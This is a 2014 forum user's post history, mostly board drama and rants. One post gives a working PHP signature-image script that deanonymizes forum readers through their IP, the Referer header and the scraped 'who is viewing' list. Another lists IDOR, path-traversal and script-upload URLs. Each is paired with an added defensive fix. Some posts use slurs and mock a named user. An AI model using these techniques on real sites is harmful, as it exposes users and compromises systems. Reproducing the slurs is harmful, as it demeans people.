
Messages - burroughs

1
I was hoping to see this place stay open, but after seeing the poll results I don't think it's worth it. There's nothing going on here except a forum (which I still surely appreciate), and with a bunch of knowledgeable people following Idio, I don't see this place progressing much further.

2
Bitch & Moan / Re: ATTN: Arnox
« on: November 22, 2014, 06:24:03 pm »
From what I understand, arnox was widely disliked at totse2 (or whatever the fuck its called, who cares)...so when he made his own site, anyone who wasn't mean to him was made a moderator here.  Other peers from totse2 who didn't get along with arnox, such as spectre, infinityshock, and fanglekai, were not only not made moderators, they are often infracted and banned because they used to make fun of arnox and now he is getting his revenge.

A more passive aggressive thin-skinned beta mormon I have never encountered.

Does this clear anything up for anyone?

Not remotely accurate. Arnox said plenty of stupid shit and was the butt of many jokes, but we were a very tight knit community. He was generally liked, and most of the users were at the very least entertained by him. I'll concede that he wasn't a very good moderator at the time, but not everyone is meant to be. Keep in mind that what we're talking about happened over the span of 5 years or so. People change.

&T2 wasn't very active when easy went AWOL. None of the long-time staff who could actually do something were that active either (Idio, Ghost, street carp, me). Arnox was not a mod at that time, and I give him a lot of credit for getting this started. I blame the state of this site on the &T2 staff who didn't do more to help him in the beginning or make this more of a collaborative effort, because I know he asked for help and tried reaching out to various people in the process.

Oh well, shit happens.

3
Help & Suggestions / Re: Should a new site be created by Idio?
« on: November 22, 2014, 05:57:26 pm »
New sites are awesome until the founder gets pissed off, shuts the place down, and breaks the hearts of his man child followers. Can we just get a sub-reddit or something? I have no more tears to spare for you faggots anymore.  :tdown:

4
Perhaps I'm just more aware of this as an adult, but do you feel like the general political climate has gotten more heated and divisive since the mid 2000's or so? People seem more set in their ways and affiliations, and in general seem to lack the ability to have a civil debate. Has this changed your job at all?

5
Spurious Generalities / Re: Somebody please make us a new board
« on: November 17, 2014, 02:55:24 am »
For any aspiring community founder please ask yourself the following questions. Do you care about..

...searchability, exposure, and a large user base?

Spoiler
Make a subreddit.

...keeping the &T feel of a standalone forum?

Spoiler
You need more than just a forum. Get creative.

...knowledgeable users and relative freedom from the long reach of the party van?

Spoiler
Take it to the d33p w3b.

6
Bitch & Moan / Re: ATTN: Trigger happy mod niggers
« on: November 17, 2014, 02:27:51 am »
Either I'm slightly colorblind or that is the most indecipherable captcha I've ever seen.

7
Network (in)Security / Why you should hide your online status on forums
« on: November 17, 2014, 01:47:28 am »
NOTE: Refresh this page once it loads for the first time to get the full effect. The referer is not set to this thread when clicking into it from elsewhere.

This is a rehash of a post I made on &T2 awhile back.



What's going on?

PHP scripts can output images with the appropriate libraries - these scripts can be referenced as images in html and BB code just as any static file might be. But we can do whatever we want in our script before returning content, and we can do some pretty naughty things. Specifically:

  • Embed a script on a forum signature that outputs an image.
  • When a user loads this image, the http referer header will be the previous page they came from.
  • Using this referer value, we can make an http request back to the same page and parse the HTML looking for the "... is viewing this topic" block.
  • Even if there are multiple people viewing, we can make a guess at an IP address if we log enough requests through a process of elimination. We can also track their viewing habits over time.
  • We can disguise our image with some nice pr0n instead of politely informing a user that we know who they are.

Things we learned
  • You should always hide your online status on forums.
  • It's a bad idea to allow users to reference external resources, especially in areas with a lot of exposure like signatures.

Code

Code:
[img]http://bursylursy.webatu.com/tracking.php[/img]
Code:
<?php
// Disable caching so the browser re-requests the image (and re-sends the referer) on every view
header("Pragma-directive: no-cache");
header("Cache-directive: no-cache");
header("Cache-control: no-cache");
header("Pragma: no-cache");
header("Expires: 0");

error_reporting(0);
$ip = $_SERVER["REMOTE_ADDR"];
$ref = $_SERVER["HTTP_REFERER"];
$displayusers = "";

if (strlen($ref) > 0) {
    header("Content-type: image/png");
    // Fetch the referring page and read the "who is viewing" block
    $response = file_get_contents($ref);
    $doc = new DOMDocument();
    $doc->loadHTML($response);
    $users = $doc->getElementById("whoisviewing")->nodeValue;

    if (strpos($users, "Members") === false) {
        $displayusers = "You are probably one of these users: " . substr($users, 0, strpos($users, " and"));
    }

    // Render the collected details as a PNG
    $im = imagecreate(900, 70);
    $bg = imagecolorallocate($im, 255, 255, 255);
    $textcolor = imagecolorallocate($im, 0, 0, 255);

    imagestring($im, 5, 5, 5, "Your ip address is: " . $ip, $textcolor);
    imagestring($im, 5, 5, 25, "You are viewing this page: " . $ref, $textcolor);
    imagestring($im, 5, 5, 45, $displayusers, $textcolor);

    imagepng($im);
    imagedestroy($im);
} else {
    // No referer: serve an ordinary picture instead
    header("Content-type: image/jpeg");
    $im = imagecreatefromjpeg("http://www.quickmeme.com/img/fa/fa3e19ffd513583d5f7ae60382262d9a0505d72589cd2374af2b2a7de75e057d.jpg");
    imagejpeg($im);
    imagedestroy($im);
}
?>
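
As an added example (not from the post above or from any forum software) of the second lesson, here is a forum-side check in Python: an [img] tag in a signature is kept only when its URL points at a static image on an allowlisted host over https, so a script endpoint like tracking.php is rewritten to a plain link and never fetched by readers' browsers. The allowlisted host names are assumptions.

```python
import re
from urllib.parse import urlsplit

# Assumed allowlist: hosts this forum serves images from (constructed names).
ALLOWED_IMAGE_HOSTS = {"forum.example", "img.forum.example"}
# A static image file is expected to carry one of these extensions.
STATIC_IMAGE_EXT = (".png", ".jpg", ".jpeg", ".gif", ".webp")

IMG_TAG = re.compile(r"\[img\](.*?)\[/img\]", re.IGNORECASE | re.DOTALL)


def image_url_is_safe(url: str) -> bool:
    """Accept only https URLs on allowlisted hosts that name a static image file.
    Anything with a query string, a fragment, or a script-like path (tracking.php)
    is a dynamic endpoint that can log the Referer of whoever loads it."""
    parts = urlsplit(url.strip())
    if parts.scheme != "https" or parts.hostname not in ALLOWED_IMAGE_HOSTS:
        return False
    if parts.query or parts.fragment:
        return False
    return parts.path.lower().endswith(STATIC_IMAGE_EXT)


def sanitize_signature(bbcode: str):
    """Rewrite every [img] whose URL fails the check into a plain [url] link, so
    the browser never fetches the remote resource (and so sends no Referer).
    Returns (cleaned bbcode, list of rejected URLs) so moderators can review them."""
    rejected = []

    def repl(match):
        url = match.group(1).strip()
        if image_url_is_safe(url):
            return match.group(0)
        rejected.append(url)
        return f"[url]{url}[/url]"

    return IMG_TAG.sub(repl, bbcode), rejected


# Header a forum should send as well: with same-origin, the page URL is never
# included in requests to any third-party image that slips through the filter.
REFERRER_POLICY_HEADER = ("Referrer-Policy", "same-origin")
```

Hiding members from the "who is viewing" block (the first lesson) is a board setting rather than code, and is still needed because the Referer alone gives an attacker the page, not the reader.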


8
But to be honest, let's think about it from the business side, i.e. the side that pays programmers' salaries: whether an application is exploitable, if it has a test suite, if it's updated, if it's meant to endure infrastructure failures (fucking 3rd party api going down or stalling on request = blocking the whole fucking application) doesn't matter at fucking all. This is what kills me at my job. Nobody cares if the code you sling is a 1000 line long procedural pool of diarrhea of if-else blocks nested 7 levels deep - as long as the css transitions look nice and the html adheres to the psd, and it's delivered on time - you're the fucking man.

Sorry for the slight rant, but I've had the opportunity... no, wait, the joy of working with code from a senior developer whom everyone praises, and I shit you not, this guy loaded a ton of logic into views (in an MVC based web app). Really, he couldn't take 30 minutes to refactor that out into a separate module that could be shared instead of duplicated?

Man, do we work at the same place?

The sad part is that when shit breaks, management sees it as a weakness in the technology used vs. the quality of the developer who worked on it. So while we have a moderately successful legacy application that requires a ton of maintenance, the higher ups have deemed that our successor application must be written with a string of unproven technology buzzwords.

Feel free to ask about anything you don't understand. The tech forums are always slow; I don't think anyone minds answering questions.

^ This, man. This so hard.

9
I once worked on an app that had a long form where they shipped the (md5) hashed password and salt to the client after the first failed login so they could validate the password client side before sending it to the server. I was just surprised that whoever implemented it originally knew enough to salt and hash passwords but not enough to know not to send the digest to clients.

Goddamn, that is fucking awful.

Well, the app I work on doesn't even hash the password client side before sending it to the server. And there's no lockout on login attempts. The only solace is that the amount of requests needed to brute force a password would take down the server long before any progress was made.

10
1. Guess the database id on a page with no access checks:

Code:
/loaddoc.php?id=123
Let's get ALL OF THE DOCS

Code:
/loaddoc.php?id=124
/loaddoc.php?id=125
....
/loaddoc.php?id=9001

2. Load a file by name from a request parameter with no sanitizing:

Code:
/loaddoc.php?filename=order.pdf
:???:

Code:
/loaddoc.php?filename=/../../../IWonderWhereIamNow/nudes.zip
3. Upload arbitrary files to a web directory with script execution enabled, don't check file extensions:

Code:
/uploads/uploaddoc.php?name=lolz.php
Unintentional and free web hosting!

Code:
/uploads/lolz.php
Do share yours.
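
Added example (not from the post or from any particular app) showing, in Python, the check that closes each of the three holes above: an ownership check on the id lookup, a filename check that confines the resolved path to the storage root, and a server-generated upload name with an extension allowlist. The documents table, storage root and allowed extensions are assumptions.

```python
import os
import secrets
from pathlib import Path
from typing import Optional

# Constructed stand-in for the documents table: id -> (owner, stored filename)
DOCS = {123: ("alice", "order.pdf"), 124: ("bob", "invoice.pdf")}
DOC_ROOT = Path("/srv/docs")                           # assumed storage root, outside the web root
ALLOWED_UPLOAD_EXT = {".pdf", ".png", ".jpg", ".txt"}  # no script extensions


def load_doc_by_id(doc_id: int, current_user: str) -> Optional[str]:
    """Hole 1 (id guessing): look the row up, then require that the caller owns it.
    Returns None for both 'missing' and 'not yours', so an enumerator running
    id=124, 125, ... learns nothing about which ids exist."""
    rec = DOCS.get(doc_id)
    if rec is None or rec[0] != current_user:
        return None
    return rec[1]


def resolve_doc_path(filename: str) -> Optional[Path]:
    """Hole 2 (path traversal): accept a bare filename only, then confirm the
    resolved path is still under DOC_ROOT after symlinks and '..' are collapsed."""
    if not filename or "\x00" in filename or filename in (".", ".."):
        return None
    if filename != os.path.basename(filename):  # rejects '/', nested paths, '/../..'
        return None
    root = DOC_ROOT.resolve()
    candidate = (root / filename).resolve()
    try:
        candidate.relative_to(root)               # raises if it escaped the root
    except ValueError:
        return None
    return candidate


def safe_upload_name(original_name: str) -> Optional[str]:
    """Hole 3 (script upload): keep only an allowlisted extension and generate the
    stored name ourselves, so 'lolz.php' (or 'lolz.php.pdf') never lands on disk
    under a script extension. Keep the upload dir with script execution off too."""
    ext = os.path.splitext(os.path.basename(original_name))[1].lower()
    if ext not in ALLOWED_UPLOAD_EXT:
        return None
    return secrets.token_hex(16) + ext
```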

11
Bitch & Moan / Re: Will Arnox ever successfully mod a female user? Lmfao.
« on: November 14, 2014, 04:09:44 am »
what was the girl that had 2 abortions, asked how to kill herself, and was a general clusterfuck of drama?

I think fangly ran her off...

oral_fixation :tdown:

12
Head Shrinkers / Fever Dreams
« on: November 14, 2014, 03:57:37 am »
Had an odd dream last night.

> go to grandparents' old house with friends
> odd because one is dead, the other is in a nursing home, and they haven't lived there for 10+ years
> go down to basement to grab food from freezer
> find freezer has been broken for awhile
> friend hands me a packaged, raw steak and says "Sorry, yours is spoiled"
> for some reason I open it and take a bite to verify
> yes, it's really spoiled
> spend the rest of the dream pulling tapeworms out of my mouth
> I really hate bugs

Quote
If one sees worms coming out of his mouth in a dream, it means that some members of his family are plotting against him, though he knows about it, and he will finally escape from their danger, but at his own expense.

http://dreamingthedreams.com/meanings/dreaming%20of%20tape%20worms/

LOLWUT

13
Help & Suggestions / Re: Advertising
« on: October 01, 2014, 12:44:29 am »
It's kind of a chicken and egg scenario where we want knowledgeable users to write good content but they won't join because there's not a lot of good content to begin with.

I always thought that totse-esque sites should offer some kind of freely available service in addition to hosting a community. Something simple and privacy / free speech related that's useful to the every-day user. A privnote clone, a simple proxy, or even something bitcoin related. Give lots of like-minded people a reason to use the site and they'll discover the community later.

14
Conspiracy! / Re: Boston bombing – a false flag terror case
« on: October 01, 2014, 12:07:04 am »
OP is clearly schizophrenic but has managed to find his way back to every &T2 incarnation. It wouldn't be home without him. <3

15
Spurious Generalities / Re: Arnox Exposed
« on: October 01, 2014, 12:02:34 am »
A Practical Guide to Dragons

lol dying

It brings a tear to mine eye having watched this awkward, dragon-obsessed teenager eternally progress to become our priesthood holder in this life and in the celestial kingdom. There is a place for you on Kolob my sweet Arnox, you just wait.
